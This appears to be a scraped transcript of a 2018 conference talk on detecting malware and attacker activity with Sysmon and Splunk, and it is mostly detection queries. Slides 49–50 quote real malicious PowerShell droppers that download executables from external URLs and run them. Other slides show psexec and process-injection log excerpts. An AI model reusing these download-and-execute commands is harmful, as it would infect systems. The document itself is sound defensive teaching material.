Advanced Incident Detection and Threat Hunting using Sysmon (and - - PowerPoint PPT Presentation

advanced incident detection and threat hunting using
SMART_READER_LITE
LIVE PREVIEW

Advanced Incident Detection and Threat Hunting using Sysmon (and - - PowerPoint PPT Presentation

Nov 09, 2023 421 likes •1.73k views

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi, Swiss Post CERT FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 1 C:\> whoami

slide-1
SLIDE 1

Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)

Tom Ueltschi, Swiss Post CERT

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 1

slide-2
SLIDE 2

 Tom Ueltschi  Swiss Post CERT / SOC / CSIRT, since July 2007 (almost 11 years!) – Focus: Malware Analysis, Threat Intel, Threat Hunting, Red Teaming  Talks about «Ponmocup Hunter» (Botconf, DeepSec, SANS DFIR Summit)  BotConf 2016 talk with same title  Member of many trust groups / infosec communities  FIRST SIG member (Malware Analysis, Red Teaming)  Twitter: @c_APT_ure

Seite 2

C:\> whoami /all

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-3
SLIDE 3

 Introduction on Sysmon and public resources  Brief recap of BotConf 2016 talk with examples  Threat Hunting & Advanced Detection examples – Malware Delivery – Internal Recon – Internal Peer-to-Peer C2 using Named Pipes – Detecting Mimikatz (even file-less / in-memory)

Seite 3

Outline

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

– Persistence Methods – Lateral Movement

slide-4
SLIDE 4

 It’s hard to come up with totally new ideas and approaches  Know and use what’s already available out there  Share experiences what works and how

Seite 4

Standing on the Shoulders of Giants

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-5
SLIDE 5

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 5

Pyramid of Pain

I want to be able to detect this!

slide-6
SLIDE 6

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 6

Sqrrl on Threat Hunting

Most examples are belong to here

slide-7
SLIDE 7

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 7

Sqrrl on Threat Hunting

slide-8
SLIDE 8

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 8

Sqrrl on Threat Hunting

slide-9
SLIDE 9

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 9

MITRE ATT&CK Matrix (Tactics)

 Examples will cover

 Persistence (Registry, Filesystem)  Discovery / Lateral Movement / Execution (WMI)  Command and Control (Named Pipes)  Credential Access (Mimikatz)

slide-10
SLIDE 10

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 10

MITRE ATT&CK Matrix (Techniques)

slide-11
SLIDE 11

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 11

MITRE ATT&CK Matrix (Techniques)

slide-12
SLIDE 12

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 12

MITRE ATT&CK Matrix (DGA)

slide-13
SLIDE 13

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 13

MITRE ATT&CK Matrix (T&T)

slide-14
SLIDE 14

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 14

MITRE ATT&CK Matrix (ABDC)

slide-15
SLIDE 15

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 15

MITRE ATT&CK Matrix

Contributions are welcome

slide-16
SLIDE 16

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 16

MITRE ATT&CK Matrix

slide-17
SLIDE 17

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 17

MITRE Cyber Analytics Repository

slide-18
SLIDE 18

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 18

MITRE Cyber Analytics Repository

slide-19
SLIDE 19

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 19

MITRE CARET (Analytics  T&T Matrix)

Map Analytics to T&T Matrix

slide-20
SLIDE 20

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 20

MITRE CARET (Analytics  T&T Matrix)

CAR: Exec of susp cmds T&T: Discovery / many

slide-21
SLIDE 21

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 21

MITRE CARET (Analytics  T&T Matrix)

CAR: Remote exec via WMI T&T: Execution / WMI

slide-22
SLIDE 22

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 22

Threat Hunting Project

slide-23
SLIDE 23

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 23

Threat Hunting Project

slide-24
SLIDE 24

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 24

ThreatHunter Playbook

slide-25
SLIDE 25

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 25

Florian Roth’s Sigma Project

slide-26
SLIDE 26

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 26

Florian Roth’s Sigma Project

slide-27
SLIDE 27

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 27

Florian Roth’s Sigma Project

slide-28
SLIDE 28

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 28

Florian Roth’s Sigma Project

slide-29
SLIDE 29

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 29

Florian Roth’s Sigma Project

slide-30
SLIDE 30

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 30

Florian Roth’s Sigma Project

slide-31
SLIDE 31

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 31

Florian Roth’s Sigma Project

Way to go, Neo! 

slide-32
SLIDE 32

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 32

Thomas Patzke’s EQUEL Project

slide-33
SLIDE 33

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 33

Mike Haag’s Sysmon DFIR Github

slide-34
SLIDE 34

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 34

Why Sysmon? RSA Con Talk M.R.

slide-35
SLIDE 35

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 35

Why Sysmon? RSA Con Talk M.R.

DLL / Proc Injection Time stomping

slide-36
SLIDE 36

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 36

Why Sysmon? RSA Con Talk M.R.

slide-37
SLIDE 37

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 37

Why Sysmon? RSA Con Talk M.R.

New event types v5 & v6 Not covered in prev talk

slide-38
SLIDE 38

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 38

Why Sysmon? RSA Con Talk M.R.

slide-39
SLIDE 39

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 39

Why Sysmon? RSA Con Talk M.R.

slide-40
SLIDE 40

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 40

Why Sysmon? RSA Con Talk M.R.

slide-41
SLIDE 41

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 41

SwiftOnSecurity’s Sysmon configs

slide-42
SLIDE 42

Seite 42

Brief Recap of BotConf 2016 Talk

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-43
SLIDE 43

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 43

Recap BotConf Talk (1/2)

Using the free Sysmon tool you can search / alert for known malicious process behaviors  Image names / paths (wrong paths)

 svchost.exe, %APPDATA%\Oracle\bin\javaw.exe

 CommandLine parameters

 /stext, vssadmin delete shadows, rundll32 qwerty

 Parent- / Child-Process relationships

 winword.exe  explorer.exe, wscript.exe  rundll32.exe

 Process injection

 # winlogon.exe

slide-44
SLIDE 44

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 44

Recap BotConf Talk (2/2)

Using the free Sysmon tool you can hunt for suspicious process behaviors  Lateral movement using admin shares

 ADMIN$, C$, IPC$ (\\127.0.0.1\...)

 Internal C&C P2P comms over named pipes / SMB

 processes using port 445 between workstations

 Rarest processes connecting thru proxy (or directly to Internet)

 count by hashes, IMPHASHes, clients, image names

 Suspicious Powershell activity

 Powershell -EncodedCommand | -enc …

slide-45
SLIDE 45

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 45

Advanced Detection (Adwind RAT)

alert_sysmon_java-malware-infection index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (Users AppData Roaming (javaw.exe OR xcopy.exe)) OR (cmd cscript vbs) | search Image="*\\AppData\\Roaming\\Oracle\\bin\\java*.exe*" OR (Image="*\\xcopy.exe*" CommandLine="*\\AppData\\Roaming\\Oracle\\*") OR CommandLine="*cscript*Retrive*.vbs*"

JBifrost RAT

slide-46
SLIDE 46

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 46

Detecting Keyloggers

 Keyloggers and Password-Stealers abusing NirSoft tools

 Limitless Logger  Predator Pain  HawkEye Keylogger  iSpy Keylogger  KeyBase Keylogger

CommandLine: <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt CommandLine: <PATH-TO-EXE>\*.exe /scomma ... index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" ( stext OR scomma ) | search CommandLine="* /stext *" OR CommandLine="* /scomma *"

slide-47
SLIDE 47

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 47

Detecting Keyloggers

 BONUS: detecting new Banking Trojan variant (Heodo/Emotet)

 Link in email to download JS from web server (DHL__Report__*.js)  Executing JS downloads EXE from web server  EXE uses «/scomma» parameter (YARA: NirSoft strings in memory)

slide-48
SLIDE 48

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 48

Detecting Keyloggers

 BONUS: detecting new Banking Trojan variant (Heodo/Emotet)

slide-49
SLIDE 49

Remove all

  • bfuscation chars

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 49

Malicious PowerShell

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (powershell.exe OR cmd.exe) | eval CommandLine2=replace(CommandLine,"[ '+\"\^]","") | search (Image="*\\powershell.exe" OR Image="*\\cmd.exe") CommandLine2="*WebClient*" CommandLine2="*DownloadFile*" "C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object Net.WebClient")).("'Do' + 'wnloadfile'").invoke( 'http://unofficialhr.top/tv/homecooking/tenderloin.php', 'C:\Users\***\AppData\Local\Temp\spasite.exe'); & "C:\Users\***\AppData\Local\Temp\spasite.exe" CommandLine2: C:\Windows\System32\cmd.exe/cpowershell-command((New-ObjectNet.WebClient)). (Downloadfile).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php, C:\Users\purpural\AppData\Local\Temp\spasite.exe);& C:\Users\purpural\AppData\Local\Temp\spasite.exe

 De-obfuscate simple obfuscation techniques Are all (obfuscation) problems solved?

slide-50
SLIDE 50

Query doesn’t match «DownloadFile»

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 50

Malicious PowerShell

cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); (( New-Object Net.WebClient )).( 'Do' + $sad + 'dfile' ).invoke( 'http://golub.histosol.ch/bluewin/mail/inbox.php' 'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba) «De-obfuscated»: powershell-c$eba=(exe);$sad=(wnloa);((New-ObjectNet.WebClient)).(Do$saddfile) .invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC:\Users\*****\AppData \Local\Temp\doc.$eba); start(C:\Users\*****\AppData\Local\Temp\doc.$eba) LNK with Powershell command

  • embedded in DOCX file (oleObject.bin)

Sample from 2016-11-18 d8af6037842458f7789aa6b30d6daefb Abrechnung # 5616147.docx 2b9c71fe5f121ea8234aca801c3bb0d9 Beleg Nr. 892234-32.lnk Strings from oleObject.bin: E:\TEMP\G\18.11.16\ch1\golub\Beleg Nr. 892234-32.lnk C:\Users\azaz\AppData\Local\Temp\Beleg Nr. 892234-32.lnk

slide-51
SLIDE 51

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 51

Processes connecting thru Proxy

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=1 [ search index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Image="*\\Users\\*" DestinationHostname="proxy.fqdn" | stats by ComputerName ProcessGuid | fields ComputerName ProcessGuid ] | fields Hashes ComputerName Image ParentImage | rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)" | rex field=Image ".*\\\\Users\\\\(?<username>[^\\\\]+)\\\\.*" | rex field=Image ".*\\\\+(?<proc_name>[^\\\\]+\.[eE][xX][eE]).*" | rex field=ParentImage ".*\\\\+(?<pproc_name>[^\\\\]+\.[eE][xX][eE]).*" | stats dc(ComputerName) AS CLIENTS, dc(MD5) AS CNT_MD5, dc(Image) AS CNT_IMAGE, values(username) AS Users, values(ComputerName) AS Computers, values(MD5) AS MD5, values(proc_name) AS proc_name, values(pproc_name) AS pproc_name by IMPHASH | where CLIENTS < 15 | sort –CLIENTS

 IMPHASH = Import Hash

slide-52
SLIDE 52

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 52

SMB traffic between WS

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3 Initiated=true SourceIp!=DestinationIp DestinationPort=445 Image!=System (SourceHostname="WS*" DestinationHostname="WS*") OR (SourceIp="10.10.*.*" DestinationIp="10.10.*.*") | stats by ComputerName ProcessGuid | fields ComputerName ProcessGuid

 Search for network connections

 SMB protocol (dst port 445)  Source and destination are workstations (hostname or IP)  Use «ProcessGuid» to correlate with other event types (proc’s)

 Search for legitimate SMB servers (filers, NAS)

 Create «whitelist» to exclude as legit dest

slide-53
SLIDE 53

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 53

Lateral Movement (admin shares)

CS_Lateral_Movement_psexec 10/18/2016 11:17:12 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ... Message=Process Create: Image: \\127.0.0.1\ADMIN$\8c0cb58.exe CommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe CurrentDirectory: C:\Windows\system32\ User: NT AUTHORITY\SYSTEM IntegrityLevel: System ParentImage: C:\Windows\system32\services.exe ParentCommandLine: C:\Windows\System32\services.exe

 Search for admin share names in image paths

C:\Windows\system32\services.exe  \\127.0.0.1\ADMIN$\8c0cb58.exe

slide-54
SLIDE 54

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 54

Lateral Movement (admin shares)

CS_Lateral_Movement_psexec 10/18/2016 11:17:13 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ... Message=Process Create: Image: C:\Windows\SysWOW64\rundll32.exe CommandLine: C:\Windows\System32\rundll32.exe CurrentDirectory: C:\Windows\system32\ User: NT AUTHORITY\SYSTEM IntegrityLevel: System ParentImage: \\127.0.0.1\ADMIN$\8c0cb58.exe ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe

 Search for admin share names in image paths

C:\Windows\system32\services.exe  \\127.0.0.1\ADMIN$\8c0cb58.exe  C:\Windows\system32\rundll32.exe

slide-55
SLIDE 55

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 55

Lateral Movement (proc injection)

CS_Lateral_Movement_psexec 10/18/2016 11:17:13 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 EventType=4 Type=Information ... Message=CreateRemoteThread detected: SourceProcessId: 29340 SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe TargetProcessId: 18476 TargetImage: C:\Windows\SysWOW64\rundll32.exe NewThreadId: 20060 StartAddress: 0x0000000000110000 StartFunction:

 Search for rarest source or target images from proc injection

\\127.0.0.1\ADMIN$\8c0cb58.exe # C:\Windows\system32\rundll32.exe

slide-56
SLIDE 56

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 56

Keylogger (proc injection)

CS_Keylogger_injection 10/26/2016 11:56:32 PM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=8 EventType=4 Type=Information ... Message=CreateRemoteThread detected: SourceProcessId: 17728 SourceImage: C:\Windows\SysWOW64\rundll32.exe TargetProcessId: 836 TargetImage: C:\Windows\System32\winlogon.exe NewThreadId: 14236 StartAddress: 0x0000000000C20000 StartFunction:

 Suspicious proc injection into «winlogon.exe»

 Steal user’s password while logging on or unlocking screensaver

C:\Windows\SysWOW64\rundll32.exe # C:\Windows\system32\winlogon.exe

slide-57
SLIDE 57

Seite 57 FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-58
SLIDE 58

 Malicious files downloaded via Browser  Sysmon «FileCreateStreamHash» events generated  Remember the malicious JS files from email links? (Heodo/Emotet)

Seite 58

Hunting for Delivery of Malware

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-59
SLIDE 59

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 59

Hunting for Delivery of Malware

 Remember that JS Filename from before?

 Let’s hunt for that… (DHL__Report__*.js)

slide-60
SLIDE 60

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 60

Hunting for Delivery of Malware

slide-61
SLIDE 61

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 61

Hunting for Delivery of Malware

slide-62
SLIDE 62

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 62

Hunting for Delivery of Malware

slide-63
SLIDE 63

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 63

Hunting for Delivery of Malware

slide-64
SLIDE 64

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 64

Hunting for Delivery of Malware

slide-65
SLIDE 65

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 65

Hunting for Delivery of Malware

NEW Email link clicked Doc file downloaded

slide-66
SLIDE 66

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 66

Hunting for Delivery of Malware

NEW Doc file opened

slide-67
SLIDE 67

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 67

Hunting for Delivery of Malware

NEW Word doc macro enabled

slide-68
SLIDE 68

 Hunting for Persistence Methods – Registry Keys – Filesystem (e.g. Startup folders)

Seite 68

Detecting Persistence Methods

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-69
SLIDE 69

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 69

Detecting Persistence (Registry)

 Searching for «Run» or «RunOnce» keys

slide-70
SLIDE 70

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 70

Detecting Persistence (Registry)

slide-71
SLIDE 71

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 71

Detecting Persistence (Registry)

slide-72
SLIDE 72

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 72

Detecting Persistence (Filesystem)

 Example for «ProcessCreate», not «FileCreate»

slide-73
SLIDE 73

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 73

Detecting Persistence (Filesystem)

This should make you go «Hmmm??»

slide-74
SLIDE 74

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 74

Detecting Persistence (Filesystem)

 Example for «FileCreate»  Less than 400 results in > 2 months

 after tuning exclusion list

slide-75
SLIDE 75

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 75

Detecting Persistence (Filesystem)

slide-76
SLIDE 76

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 76

Detecting Persistence (Filesystem)

slide-77
SLIDE 77

 Internal Recon used as preparation for Lateral Movement  Legit system commands used  Can also be used by sysadmins or users  Baseline and find appropriate thresholds – Number of different commands and time window

Seite 77

Detecting Internal Recon

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-78
SLIDE 78

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 78

Detecting Internal Recon

slide-79
SLIDE 79

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 79

Detecting Internal Recon

slide-80
SLIDE 80

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 80

Detecting Internal Recon

slide-81
SLIDE 81

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 81

Detecting Internal Recon

slide-82
SLIDE 82

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 82

Detecting Internal Recon

slide-83
SLIDE 83

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 83

Detecting Internal Recon

 3 or more (of 7) different commands executed within 15 min

slide-84
SLIDE 84

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 84

Detecting Internal Recon

15 occurences 6 diff cmds within 15 mins

slide-85
SLIDE 85

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 85

Detecting Internal Recon

3 diff cmds within 3 mins «False detections» are possible Explorer -> cmd.exe

slide-86
SLIDE 86

 Lateral Movement using WMI for Execution

Seite 86

Lateral Movement

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-87
SLIDE 87

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 87

ATT&CK TTP on WMI

slide-88
SLIDE 88

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 88

Who’s (ab-)using WMI

 Point 1

slide-89
SLIDE 89

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 89

Who’s (ab-)using WMI

slide-90
SLIDE 90

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 90

Who’s (ab-)using WMI

slide-91
SLIDE 91

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 91

Who’s (ab-)using WMI

slide-92
SLIDE 92

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 92

Who’s (ab-)using WMI

slide-93
SLIDE 93

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 93

Who’s (ab-)using WMI

slide-94
SLIDE 94

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 94

Testing with WMImplant

 Testing «command_exec» using WMImplant with PS-ISE

slide-95
SLIDE 95

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 95

Testing with WMImplant

 Testing «process_start» using WMImplant with Beacon

slide-96
SLIDE 96

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 96

Detecting WMI spawned proc’s

 Point 1

slide-97
SLIDE 97

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 97

Detecting WMI spawned proc’s

 Point 1

slide-98
SLIDE 98

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 98

Detecting WMI spawned proc’s

 Searching for Child-Process creations of «wmiprvse.exe»  Filtering out «known good» processes  Don’t filter out «Powershell.exe» in general

 Combine with «CommandLine» params

slide-99
SLIDE 99

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 99

Detecting WMI spawned proc’s

 Command executions («powershell *$env:*» and IEX, obfusc.)  Processes started (calc.exe, notepad.exe …)

slide-100
SLIDE 100

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE Seite 100

Detecting WMI spawned proc’s

 Also detecting CS Beacons WMI Lateral Movement method

 «powershell.exe … -encodedcommand …»

slide-101
SLIDE 101

 Internal Peer-to-Peer C&C using Named Pipes over SMB  Using Cobalt Strike Beacon’s features for testing

Seite 101

Internal P2P C2 using Named Pipes

FIRST-TC 2018 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE

slide-102
